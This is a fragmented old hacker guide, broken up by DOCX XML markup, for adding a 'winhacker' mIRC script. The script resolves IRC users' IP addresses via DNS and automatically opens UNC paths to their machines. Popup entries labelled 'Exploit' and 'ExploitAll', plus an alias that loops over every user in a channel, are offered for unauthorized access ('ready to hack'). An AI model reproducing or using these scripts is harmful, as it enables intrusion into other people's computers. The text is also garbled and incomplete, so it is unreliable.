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are two options you can add to work winhacker in mI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first you will nee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script.ini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cri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n0=on 1:DNS: {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>n1= set %killaddr $i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2=run \\ $+ [ %killaddr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3=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ready to hack ;)  anytime you do a dns on a nick on ir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connect to their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  /dns warez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now on to the fun stuff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popups.ini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[lPopup] section you ad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ine numbers might be different on yours, just put n21=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line is at the bottom, you are just adding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23=Exploit:/dns $$1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>n24=ExploitAll:/alldns  *note* to make this work you just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alias bel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bove all you need to do is right click on any user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For the exploitall option you will need to add this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liases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e numbers like 25= depends on your own line number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15=alldns {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>n16=set %total $nick($active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17=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18=dns $nick($active,%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19=dec %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20=if %total == 0 { hal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n21=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ready to hack using mIRC ;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